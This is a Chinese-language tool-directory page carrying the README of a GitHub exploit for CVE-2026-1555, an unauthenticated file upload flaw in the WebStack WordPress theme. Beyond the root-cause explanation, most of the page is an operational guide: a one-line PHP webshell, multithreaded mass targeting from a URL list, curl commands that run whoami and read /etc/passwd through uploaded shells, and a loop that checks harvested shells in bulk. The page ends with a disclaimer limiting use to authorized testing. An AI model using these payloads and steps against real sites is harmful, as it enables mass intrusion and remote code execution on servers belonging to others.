Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-1555 — WebStack <= 1.2024 - 未认证任意文件上传 | Kitploit
工具/GitHubGitHub/nxploited/cve-2026-1555
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubnxploited/cve-2026-1555

CVE-2026-1555

WebStack <= 1.2024 - 未认证任意文件上传

查看仓库
9154个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-1555

WebStack <= 1.2024 - 未认证任意文件上传

👤 作者: Nxploited

🔗 Nxploited ZeroDay Hub — t.me/KNxploited


💀 CVE-2026-1555 — WebStack WordPress 任意文件上传

通过 img_upload AJAX 处理器实现未认证远程代码执行

Python CVE CVSS Auth


📌 漏洞概述

🔬 技术根因

注册在 WordPress admin-ajax.php 动作钩子 img_upload 下的 io_img_upload() 函数,在将上传文件写入服务器之前不进行任何文件类型或扩展名校验。由于该动作通过 wp_ajax_nopriv_ 注册且未进行认证检查,任何未认证的远程攻击者都可以 POST 任意文件(包括 PHP Webshell),服务器会将其保存到可公开访问的路径中,从而实现直接的远程代码执行。

存在漏洞的端点:

root@kitploit:~
POST /wp-admin/admin-ajax.php
action=img_upload
files=@<payload>

⚙️ 工具特性

  • 🔁 多线程扫描,可配置工作线程数量
  • 📋 通过目标列表文件支持批量目标
  • 📤 自动从 JSON 响应中提取 Shell URL
  • 💾 成功的 Shell URL 保存至 uploaded_paths.txt
  • 🎨 丰富的终端 UI,支持实时进度跟踪
  • 🔕 禁用 SSL 证书验证以获得最大兼容性

📦 环境要求

Python 版本: 3.8+

安装依赖:

root@kitploit:~
pip install requests rich urllib3

🚀 使用方法

1. 准备目标列表

创建一个名为 list.txt 的文件(或任何你喜欢的名称),每行一个目标:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com

未包含 http:// 或 https:// 的目标会自动添加 http:// 前缀。

2. 准备 Payload

将你的 Webshell 放在与脚本相同的目录中。示例:

root@kitploit:~
# Minimal PHP webshell
echo '<?php system($_GET["cmd"]); ?>' > shell.php

3. 运行工具

root@kitploit:~
python CVE-2026-1555.py

运行后会提示你输入:

提示项说明

📤 输出与 Shell 提取

实时输出

每次上传成功都会打印:

root@kitploit:~
╭─ IMG_UPLOAD ──────────────────────────────────╮
│ Upload successful                              │
│                                                │
│ Target:    https://target.com                  │
│ Shell URL: https://target.com/wp-content/...   │
╰────────────────────────────────────────────────╯

结果保存

所有成功的 Shell URL 都会被追加到:

root@kitploit:~
uploaded_paths.txt

访问你的 Shell

上传成功后,可通过浏览器或 curl 直接访问 Shell:

root@kitploit:~
# Browser
https://target.com/wp-content/uploads/shell.php?cmd=id

# curl
curl "https://target.com/wp-content/uploads/shell.php?cmd=whoami"

# Full command execution
curl "https://target.com/wp-content/uploads/shell.php?cmd=cat+/etc/passwd"

确切的上传路径会自动从服务器的 JSON 响应(data.src)中提取并打印。

批量 Shell 验证

通过输出文件快速验证所有已上传的 Shell:

root@kitploit:~
while read url; do
  echo -n "[*] $url -> "
  curl -sk "$url?cmd=id" 2>/dev/null || echo "DEAD"
done < uploaded_paths.txt

📊 汇总输出

每次运行结束时都会打印一份汇总:

root@kitploit:~
Summary  50/50  OK: 12  FAIL: 38
╭──────────────────────────────────────────╮
│  Shell URLs saved to uploaded_paths.txt  │
╰──────────────────────────────────────────╯

🗂️ 文件结构

root@kitploit:~
CVE-2026-1555.py       ← Main exploit script
list.txt               ← Target URLs (one per line)
shell.php              ← Payload to upload
uploaded_paths.txt     ← Auto-generated: successful shell URLs

⚠️ 免责声明

本工具仅限用于授权的渗透测试、安全研究和教育目的。

作者 — Nxploited — 对使用本工具进行的任何滥用、损害或非法活动不承担任何责任。使用本工具即表示你确认已获得对所有目标系统进行测试的明确书面授权。

对你不拥有或未经明确授权测试的系统进行未授权使用是非法的,并可能依据适用的网络犯罪法律受到刑事起诉。

请负责任地使用。你应对自己的行为承担全部责任。


👤 作者: Nxploited 📣 频道: Nxploited ZeroDay Hub 💬 Telegram: @KNxploited

下载工具
字段详情
CVE IDCVE-2026-1555
受影响组件WebStack WordPress 主题
受影响版本所有版本,最高至 1.2024(含)
漏洞类型任意文件上传 → 远程代码执行
所需认证❌ 无需认证(未认证)
CVSS 评分9.8 严重(CRITICAL)
CVSS 向量CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
默认值
Targets file目标列表文件路径list.txt
Threads并发工作线程数6
Local file to upload要上传的文件名(位于脚本目录)shell.php